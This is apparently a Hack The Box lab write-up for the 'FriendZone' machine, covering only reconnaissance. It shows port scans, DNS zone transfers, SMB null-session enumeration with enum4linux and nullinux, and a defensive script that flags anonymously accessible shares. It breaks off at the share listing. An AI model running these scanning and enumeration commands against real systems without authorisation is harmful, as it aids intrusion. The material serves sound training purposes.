FriendZone
Port scan
u505@kali:~/HTB/Machines/FriendZone$ sudo masscan -e tun0 -p1-65535,U:1-65535 10.10.10.123 --rate=1000
[sudo] password for u505:

Starting masscan 1.0.5 at 2020-02-18 14:19:45 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 139/tcp on 10.10.10.123
Discovered open port 445/tcp on 10.10.10.123
Discovered open port 80/tcp on 10.10.10.123
Discovered open port 443/tcp on 10.10.10.123
Discovered open port 53/tcp on 10.10.10.123
Discovered open port 22/tcp on 10.10.10.123
Discovered open port 137/udp on 10.10.10.123
Discovered open port 21/tcp on 10.10.10.123
Discovered open port 53/udp on 10.10.10.123

u505@kali:~/HTB/Machines/FriendZone$ nmap -sC -sV 10.10.10.123
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-18 09:19 EST
Nmap scan report for friendzone.htb (10.10.10.123)
Host is up (0.038s latency).
Not shown: 993 closed ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
|   256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_  256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp  open  domain      ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open  ssl/http    Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after:  2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -38m51s, deviation: 1h09m16s, median: 1m07s
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: friendzone
|   NetBIOS computer name: FRIENDZONE\x00
|   Domain name: \x00
|   FQDN: friendzone
|_  System time: 2020-02-18T16:21:14+02:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-02-18T14:21:14
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.44 seconds
Port 80
u505@kali:~/HTB/Machines/FriendZone$ curl http://10.10.10.123
<title>Friend Zone Escape software</title>
<br>
<center><h2>Have you ever been friendzoned ?</h2></center>
<br>
<center><img src="fz.jpg"></center>
<br>
<center><h2>if yes, try to get out of this zone ;)</h2></center>
<br>
<center><h2>Call us at : +999999999</h2></center>
<br>
<center><h2>Email us at: info@friendzoneportal.red</h2></center>
The contact e-mail address reveals a domain: friendzoneportal.red.
u505@kali:~/HTB/Machines/FriendZone$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "txt" -f -t 50 -u http://10.10.10.123

  _|. _ _  _  _  _ _|_    v0.3.9
 (_||| _) (/_(_|| (_| )

Extensions: txt | HTTP method: get | Threads: 50 | Wordlist size: 9221

Error Log: /opt/utils/dirsearch/logs/errors-20-02-18_09-39-32.log

Target: http://10.10.10.123

[09:39:32] Starting:
[09:39:36] 403 -  300B - /.htpasswd.txt
[09:39:46] 403 -  293B - /icons/
[09:39:55] 200 -   13B - /robots.txt
[09:39:56] 403 -  301B - /server-status/
[09:40:01] 200 -  747B - /wordpress/

Task Completed
The robots.txt file contains nothing useful:

u505@kali:~/HTB/Machines/FriendZone$ curl http://10.10.10.123/robots.txt
seriously ?!

and the wordpress folder is empty.
Port 53
Two zones have been found, friendzone.red and friendzoneportal.red, and the server allows a zone transfer (AXFR) for both:
u505@kali:~/HTB/Machines/FriendZone$ dig @10.10.10.123 axfr friendzone.red

; <<>> DiG 9.11.14-3-Debian <<>> @10.10.10.123 axfr friendzone.red
; (1 server found)
;; global options: +cmd
friendzone.red.                 604800  IN  SOA   localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red.                 604800  IN  AAAA  ::1
friendzone.red.                 604800  IN  NS    localhost.
friendzone.red.                 604800  IN  A     127.0.0.1
administrator1.friendzone.red.  604800  IN  A     127.0.0.1
hr.friendzone.red.              604800  IN  A     127.0.0.1
uploads.friendzone.red.         604800  IN  A     127.0.0.1
friendzone.red.                 604800  IN  SOA   localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 39 msec
;; SERVER: 10.10.10.123#53(10.10.10.123)
;; WHEN: Tue Feb 18 10:01:13 EST 2020
;; XFR size: 8 records (messages 1, bytes 289)

u505@kali:~/HTB/Machines/FriendZone$ dig @10.10.10.123 axfr friendzoneportal.red

; <<>> DiG 9.11.14-3-Debian <<>> @10.10.10.123 axfr friendzoneportal.red
; (1 server found)
;; global options: +cmd
friendzoneportal.red.           604800  IN  SOA   localhost. root.localhost. 2 604800 86400 2419200 604800
friendzoneportal.red.           604800  IN  AAAA  ::1
friendzoneportal.red.           604800  IN  NS    localhost.
friendzoneportal.red.           604800  IN  A     127.0.0.1
admin.friendzoneportal.red.     604800  IN  A     127.0.0.1
files.friendzoneportal.red.     604800  IN  A     127.0.0.1
imports.friendzoneportal.red.   604800  IN  A     127.0.0.1
vpn.friendzoneportal.red.       604800  IN  A     127.0.0.1
friendzoneportal.red.           604800  IN  SOA   localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 38 msec
;; SERVER: 10.10.10.123#53(10.10.10.123)
;; WHEN: Tue Feb 18 10:02:35 EST 2020
;; XFR size: 9 records (messages 1, bytes 309)
We add the discovered hostnames to our hosts file:

u505@kali:~/HTB/Machines/FriendZone$ cat /etc/hosts | grep friend
10.10.10.123 friendzone.htb friendzone friendzone.red friendzoneportal.red administrator1.friendzone.red hr.friendzone.red uploads.friendzone.red files.friendzoneportal.red imports.friendzoneportal.red vpn.friendzoneportal.red admin.friendzoneportal.red
Test on port 80
Port 80 does not serve different content per hostname (there is no name-based virtual hosting on the plain HTTP port; SNI only applies to TLS anyway): the response is exactly the same as for the direct IP.

u505@kali:~/HTB/Machines/FriendZone$ curl http://hr.friendzone.red
<title>Friend Zone Escape software</title>
<br>
<center><h2>Have you ever been friendzoned ?</h2></center>
<br>
<center><img src="fz.jpg"></center>
<br>
<center><h2>if yes, try to get out of this zone ;)</h2></center>
<br>
<center><h2>Call us at : +999999999</h2></center>
<br>
<center><h2>Email us at: info@friendzoneportal.red</h2></center>
Port 445
nmap enum
u505@kali:~/HTB/Machines/FriendZone$ nmap -p 445 --script=smb-enum-shares 10.10.10.123
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-18 10:14 EST
Nmap scan report for friendzone.htb (10.10.10.123)
Host is up (0.038s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\10.10.10.123\Development:
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\etc\Development
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\Files:
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files /etc/Files
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\etc\hole
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.10.123\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (FriendZone server (Samba, Ubuntu))
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\general:
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\etc\general
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\print$:
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>

Nmap done: 1 IP address (1 host up) scanned in 10.01 seconds
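The share listing above is the finding a defender wants to catch before anyone else does: two disk shares (Development and general) that a guest session can read and write. As an added example (not code from the original writeup), the script below parses nmap's smb-enum-shares text format and reports every disk share with anonymous access; the input is a constructed excerpt of the scan output shown above.

```python
"""Audit nmap smb-enum-shares output for shares reachable by a guest session."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed input: an excerpt of the smb-enum-shares output shown in the scan above.
SAMPLE_SCAN = r"""
| smb-enum-shares:
|   account_used: guest
|   \\10.10.10.123\Development:
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files
|     Path: C:\etc\Development
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\Files:
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files /etc/Files
|     Path: C:\etc\hole
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.10.123\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\general:
|     Type: STYPE_DISKTREE
|     Path: C:\etc\general
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\print$:
|     Type: STYPE_DISKTREE
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>
"""


@dataclass
class Share:
    name: str
    share_type: str = ""
    path: str = ""
    anonymous: str = "<none>"  # value of the "Anonymous access" field


# A share header looks like "|   \\HOST\NAME:" (NAME may end in $).
SHARE_RE = re.compile(r"^\|_?\s+\\\\[^\\]+\\([^:]+):\s*$")
# A field line looks like "|     Key words: value".
FIELD_RE = re.compile(r"^\|_?\s+([A-Za-z ]+):\s*(.*)$")


def parse_shares(text: str) -> list[Share]:
    """Return the shares listed in smb-enum-shares output, in listing order."""
    shares: list[Share] = []
    current: Share | None = None
    for line in text.splitlines():
        m = SHARE_RE.match(line)
        if m:
            current = Share(name=m.group(1))
            shares.append(current)
            continue
        m = FIELD_RE.match(line)
        if not m or current is None:
            continue
        key, value = m.group(1).strip(), m.group(2).strip()
        if key == "Type":
            current.share_type = value
        elif key == "Path":
            current.path = value
        elif key == "Anonymous access":
            current.anonymous = value
    return shares


def audit_shares(shares: list[Share]) -> list[tuple[str, str, str]]:
    """Flag disk shares a null/guest session can reach as (name, finding, path)."""
    findings = []
    for s in shares:
        if s.share_type == "STYPE_IPC_HIDDEN":
            continue  # IPC$ is always listed; it is not a file share
        if "WRITE" in s.anonymous:
            findings.append((s.name, "anonymous write", s.path))
        elif "READ" in s.anonymous:
            findings.append((s.name, "anonymous read", s.path))
    return findings


if __name__ == "__main__":
    for name, finding, path in audit_shares(parse_shares(SAMPLE_SCAN)):
        print(f"{name:<12} {finding:<16} {path}")
```

The server-side fix for each flagged share is in smb.conf: set guest ok = no (and read only = yes unless uploads are genuinely required) on that share.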
enum4linux
u505@kali:~/HTB/Machines/FriendZone$ enum4linux 10.10.10.123
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Feb 18 10:21:03 2020

 ==========================
|    Target Information    |
 ==========================
Target ........... 10.10.10.123
RID Range ........ 500-550,1000-1050
Username .........
Password .........
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ====================================================
|    Enumerating Workgroup/Domain on 10.10.10.123    |
 ====================================================
[+] Got domain/workgroup name: WORKGROUP

 ============================================
|    Nbtstat Information for 10.10.10.123    |
 ============================================
Looking up status of 10.10.10.123
    FRIENDZONE      <00> -         B <ACTIVE>  Workstation Service
    FRIENDZONE      <03> -         B <ACTIVE>  Messenger Service
    FRIENDZONE      <20> -         B <ACTIVE>  File Server Service
    ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
    WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
    WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
    WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

    MAC Address = 00-00-00-00-00-00

 =====================================
|    Session Check on 10.10.10.123    |
 =====================================
[+] Server 10.10.10.123 allows sessions using username , password

 ===========================================
|    Getting domain SID for 10.10.10.123    |
 ===========================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ======================================
|    OS information on 10.10.10.123    |
 ======================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.10.123 from smbclient:
[+] Got OS info for 10.10.10.123 from srvinfo:
    FRIENDZONE     Wk Sv PrQ Unx NT SNT FriendZone server (Samba, Ubuntu)
    platform_id     :  500
    os version      :  6.1
    server type     :  0x809a03

 =============================
|    Users on 10.10.10.123    |
 =============================
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.

Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.

 =========================================
|    Share Enumeration on 10.10.10.123    |
 =========================================

    Sharename       Type      Comment
    ---------       ----      -------
    print$          Disk      Printer Drivers
    Files           Disk      FriendZone Samba Server Files /etc/Files
    general         Disk      FriendZone Samba Server Files
    Development     Disk      FriendZone Samba Server Files
    IPC$            IPC       IPC Service (FriendZone server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 10.10.10.123
//10.10.10.123/print$       Mapping: DENIED, Listing: N/A
//10.10.10.123/Files        Mapping: DENIED, Listing: N/A
//10.10.10.123/general      Mapping: OK, Listing: OK
//10.10.10.123/Development  Mapping: OK, Listing: OK
//10.10.10.123/IPC$         [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
 ====================================================
|    Password Policy Information for 10.10.10.123    |
 ====================================================

[+] Attaching to 10.10.10.123 using a NULL share

[+] Trying protocol 139/SMB...

[+] Found domain(s):

    [+] FRIENDZONE
    [+] Builtin

[+] Password Info for Domain: FRIENDZONE

    [+] Minimum password length: 5
    [+] Password history length: None
    [+] Maximum password age: 37 days 6 hours 21 minutes
    [+] Password Complexity Flags: 000000

        [+] Domain Refuse Password Change: 0
        [+] Domain Password Store Cleartext: 0
        [+] Domain Password Lockout Admins: 0
        [+] Domain Password No Clear Change: 0
        [+] Domain Password No Anon Change: 0
        [+] Domain Password Complex: 0

    [+] Minimum password age: None
    [+] Reset Account Lockout Counter: 30 minutes
    [+] Locked Account Duration: 30 minutes
    [+] Account Lockout Threshold: None
    [+] Forced Log off Time: 37 days 6 hours 21 minutes
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled Minimum Password Length: 5
 ==============================
|    Groups on 10.10.10.123    |
 ==============================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
======================================================================= | Users on 10.10.10.123 via RID cycling (RIDS: 500-550,1000-1050) | ======================================================================= [I] Found new SID: S-1-22-1 [I] Found new SID: S-1-5-21-3651157261-4258463691-276428382 [I] Found new SID: S-1-5-32 [+] Enumerating users using SID S-1-22-1 and logon username , password S-1-22-1-1000 Unix User\friend (Local User) [+] Enumerating users using SID S-1-5-21-3651157261-4258463691-276428382 and logon username , password S-1-5-21-3651157261-4258463691-276428382-500 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-501 FRIENDZONE\nobody (Local User) S-1-5-21-3651157261-4258463691-276428382-502 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-503 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-504 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-505 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-506 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-507 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-508 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-509 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-510 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-511 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-512 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-513 FRIENDZONE\None (Domain Group) S-1-5-21-3651157261-4258463691-276428382-514 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-515 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-516 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-517 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-518 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-519 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-520 
*unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-521 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-522 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-523 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-524 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-525 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-526 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-527 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-528 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-529 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-530 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-531 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-532 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-533 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-534 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-535 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-536 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-537 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-538 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-539 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-540 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-541 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-542 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-543 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-544 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-545 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-546 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-547 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-548 *unknown*\*unknown* (8) 
S-1-5-21-3651157261-4258463691-276428382-549 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-550 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1000 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1001 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1002 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1003 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1004 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1005 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1006 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1007 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1008 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1009 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1010 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1011 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1012 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1013 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1014 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1015 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1016 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1017 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1018 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1019 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1020 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1021 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1022 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1023 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1024 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1025 *unknown*\*unknown* (8) 
S-1-5-21-3651157261-4258463691-276428382-1026 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1027 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1028 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1029 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1030 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1031 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1032 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1033 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1034 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1035 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1036 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1037 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1038 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1039 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1040 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1041 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1042 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1043 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1044 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1045 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1046 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1047 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1048 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1049 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1050 *unknown*\*unknown* (8) [+] Enumerating users using SID S-1-5-32 and logon username , password S-1-5-32-500 *unknown*\*unknown* (8) S-1-5-32-501 *unknown*\*unknown* (8) S-1-5-32-502 *unknown*\*unknown* (8) S-1-5-32-503 *unknown*\*unknown* (8) S-1-5-32-504 
*unknown*\*unknown* (8) S-1-5-32-505 *unknown*\*unknown* (8) S-1-5-32-506 *unknown*\*unknown* (8) S-1-5-32-507 *unknown*\*unknown* (8) S-1-5-32-508 *unknown*\*unknown* (8) S-1-5-32-509 *unknown*\*unknown* (8) S-1-5-32-510 *unknown*\*unknown* (8) S-1-5-32-511 *unknown*\*unknown* (8) S-1-5-32-512 *unknown*\*unknown* (8) S-1-5-32-513 *unknown*\*unknown* (8) S-1-5-32-514 *unknown*\*unknown* (8) S-1-5-32-515 *unknown*\*unknown* (8) S-1-5-32-516 *unknown*\*unknown* (8) S-1-5-32-517 *unknown*\*unknown* (8) S-1-5-32-518 *unknown*\*unknown* (8) S-1-5-32-519 *unknown*\*unknown* (8) S-1-5-32-520 *unknown*\*unknown* (8) S-1-5-32-521 *unknown*\*unknown* (8) S-1-5-32-522 *unknown*\*unknown* (8) S-1-5-32-523 *unknown*\*unknown* (8) S-1-5-32-524 *unknown*\*unknown* (8) S-1-5-32-525 *unknown*\*unknown* (8) S-1-5-32-526 *unknown*\*unknown* (8) S-1-5-32-527 *unknown*\*unknown* (8) S-1-5-32-528 *unknown*\*unknown* (8) S-1-5-32-529 *unknown*\*unknown* (8) S-1-5-32-530 *unknown*\*unknown* (8) S-1-5-32-531 *unknown*\*unknown* (8) S-1-5-32-532 *unknown*\*unknown* (8) S-1-5-32-533 *unknown*\*unknown* (8) S-1-5-32-534 *unknown*\*unknown* (8) S-1-5-32-535 *unknown*\*unknown* (8) S-1-5-32-536 *unknown*\*unknown* (8) S-1-5-32-537 *unknown*\*unknown* (8) S-1-5-32-538 *unknown*\*unknown* (8) S-1-5-32-539 *unknown*\*unknown* (8) S-1-5-32-540 *unknown*\*unknown* (8) S-1-5-32-541 *unknown*\*unknown* (8) S-1-5-32-542 *unknown*\*unknown* (8) S-1-5-32-543 *unknown*\*unknown* (8) S-1-5-32-544 BUILTIN\Administrators (Local Group) S-1-5-32-545 BUILTIN\Users (Local Group) S-1-5-32-546 BUILTIN\Guests (Local Group) S-1-5-32-547 BUILTIN\Power Users (Local Group) S-1-5-32-548 BUILTIN\Account Operators (Local Group) S-1-5-32-549 BUILTIN\Server Operators (Local Group) S-1-5-32-550 BUILTIN\Print Operators (Local Group) S-1-5-32-1000 *unknown*\*unknown* (8) S-1-5-32-1001 *unknown*\*unknown* (8) S-1-5-32-1002 *unknown*\*unknown* (8) S-1-5-32-1003 *unknown*\*unknown* (8) S-1-5-32-1004 *unknown*\*unknown* (8) 
S-1-5-32-1005 *unknown*\*unknown* (8) S-1-5-32-1006 *unknown*\*unknown* (8) S-1-5-32-1007 *unknown*\*unknown* (8) S-1-5-32-1008 *unknown*\*unknown* (8) S-1-5-32-1009 *unknown*\*unknown* (8) S-1-5-32-1010 *unknown*\*unknown* (8) S-1-5-32-1011 *unknown*\*unknown* (8) S-1-5-32-1012 *unknown*\*unknown* (8) S-1-5-32-1013 *unknown*\*unknown* (8) S-1-5-32-1014 *unknown*\*unknown* (8) S-1-5-32-1015 *unknown*\*unknown* (8) S-1-5-32-1016 *unknown*\*unknown* (8) S-1-5-32-1017 *unknown*\*unknown* (8) S-1-5-32-1018 *unknown*\*unknown* (8) S-1-5-32-1019 *unknown*\*unknown* (8) S-1-5-32-1020 *unknown*\*unknown* (8) S-1-5-32-1021 *unknown*\*unknown* (8) S-1-5-32-1022 *unknown*\*unknown* (8) S-1-5-32-1023 *unknown*\*unknown* (8) S-1-5-32-1024 *unknown*\*unknown* (8) S-1-5-32-1025 *unknown*\*unknown* (8) S-1-5-32-1026 *unknown*\*unknown* (8) S-1-5-32-1027 *unknown*\*unknown* (8) S-1-5-32-1028 *unknown*\*unknown* (8) S-1-5-32-1029 *unknown*\*unknown* (8) S-1-5-32-1030 *unknown*\*unknown* (8) S-1-5-32-1031 *unknown*\*unknown* (8) S-1-5-32-1032 *unknown*\*unknown* (8) S-1-5-32-1033 *unknown*\*unknown* (8) S-1-5-32-1034 *unknown*\*unknown* (8) S-1-5-32-1035 *unknown*\*unknown* (8) S-1-5-32-1036 *unknown*\*unknown* (8) S-1-5-32-1037 *unknown*\*unknown* (8) S-1-5-32-1038 *unknown*\*unknown* (8) S-1-5-32-1039 *unknown*\*unknown* (8) S-1-5-32-1040 *unknown*\*unknown* (8) S-1-5-32-1041 *unknown*\*unknown* (8) S-1-5-32-1042 *unknown*\*unknown* (8) S-1-5-32-1043 *unknown*\*unknown* (8) S-1-5-32-1044 *unknown*\*unknown* (8) S-1-5-32-1045 *unknown*\*unknown* (8) S-1-5-32-1046 *unknown*\*unknown* (8) S-1-5-32-1047 *unknown*\*unknown* (8) S-1-5-32-1048 *unknown*\*unknown* (8) S-1-5-32-1049 *unknown*\*unknown* (8) S-1-5-32-1050 *unknown*\*unknown* (8)
 =============================================
|    Getting printer info for 10.10.10.123    |
 =============================================
No printers returned.
enum4linux complete on Tue Feb 18 10:25:12 2020
Nullinux
u505@kali:~/HTB/Machines/FriendZone$ python3 /opt/utils/nullinux/nullinux.py 10.10.10.123
Starting nullinux v5.4.1 | 02-18-2020 10:25
[*] Enumerating Shares for: 10.10.10.123
    Shares                                   Comments
   -------------------------------------------
